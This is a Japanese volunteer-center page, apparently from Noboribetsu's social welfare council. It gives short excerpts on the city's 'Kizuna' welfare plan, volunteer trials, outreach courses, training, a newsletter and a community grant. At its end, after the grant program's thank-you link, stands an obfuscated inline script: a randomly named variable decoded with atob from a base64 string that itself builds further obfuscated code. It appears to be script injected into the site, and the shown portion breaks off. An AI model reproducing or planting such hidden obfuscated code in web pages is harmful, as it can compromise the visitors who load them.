ボランティア活動に関すること

「きずな」とは・・・"市民とともにつくられた、市民とともに取り組む5か年計画の福祉活動計画"です。地域にある行政だけでは解決しにくい生活課題を地域福祉の推進役として位置づけられている「社会福祉協議会」が中心となり、地域住民、関係機関・団体、企業等により、福祉のまちづくりをめざして、それぞれにできることをまとめた行動計画です。登別市社協ではこの計画の愛称を「きずな」としています。現在は第3期計画に基づき、取り組みを推進しています。 「きずな」は誰がつくるの?アンケート調査や住民座談...
ボランティアセンターとは…ボランティアセンターは、様々な方からのボランティアに関する相談に応じ、様々な情報提供を行いながら、ボランティア活動したい人と必要としている人を結びつける場所です。 ボランティアセンターの役割ボランティアセンターでは、 ボランティア活動に関する相談・情報提供 活動したい人と受けたい人との調整 研修会や専門講座の開催 ボランティアの資料提供や資材の貸出 関係機関や団体との連絡調整 ボランティア登録・保険加入 などを行っています。※ボランティアセンターについてボランティア...
ボランティア体験誰もが気軽に楽しくボランティア活動を体験できる「ボランティア体験プログラム」を実施しています。福祉施設、病院、保育所、ボランティア団体など関係機関のご協力のもと、たくさんの体験メニューをご用意しています。出来るところからボランティアをはじめてみませんか?体験のお申し込みやお問い合わせは、登別市ボランティアセンター(℡88-2080)までご連絡ください。メニューは決まっていないけど、何かボランティアをやってみたい!という方も、お気軽にお問合せください。 ※2020年度の「ボランティア...
出前福祉講座ボランティアセンターでは、市民の福祉意識向上とボランティア活動への参加促進をめざし「出前福祉講座」を行っています。「出前福祉講座」では、様々な学習テーマを通して⾝近な福祉について考える講座を企画から講師派遣・実施まで、ボランティア団体や関係機関などと協働し、講座に関わる全ての⼈が福祉について学び合えるようご希望に合わせたコーディネートを⾏います。学校の授業や企業・団体の研修等にぜひご活用ください。※今年度は感染症対策に留意した上で実施いたします。詳細は以下のパンフレットからご覧いた...
ボランティア研修ボランティア活動への意欲向上や活動者同士の交流、活動者のスキルアップ等を目的とした様々な研修会を開催しています。研修会を通して様々な方と出会い、情報交換が出来るので、活動を行う上でのヒントが得られるかも! ボランティア研修会関係の情報は順次更新いたします。
ボランティア活動の普及啓発を目的に、ボランティアセンター情報誌を発行しています。多くの市民が気軽にボランティア情報を手に入れられるよう市内の公共施設にも設置しています。登別市ボランティアセンターでは、最新のボランティア情報や市内のボランティア活動を発信するため、ボランティアの皆さんの手作りによる「登別市ボランティアセンター情報誌ほっと♨」を発行し、活動者や地域の皆さんの生の声をお届けしています。【2020年度】 ほっと 第38号( 12月1日発行) ほっと 第37号( 8月1日発行)【2019年度】 ほっと 第3...
きずなのまちづくり助成事業とは登別市地域福祉実践計画「きずな」の趣旨に沿った地域福祉活動やボランティア活動を行なう事業に対し、赤い羽根共同募金の配分金を活用して助成金を交付する取り組みです。助成事業の詳細については、次のとおりです。※実施要綱はこちら※チラシはこちら※様式等はこちら きずなのまちづくり助成事業ありがとうメッセージ集きずなのまちづくり助成を受けて活動を行った団体からの声をお伝えします。ありがとうメッセージ集   var NBKMEPXDOH = atob('dmFyIEVDV0pGRVNCQ0YgPSBTdHJ...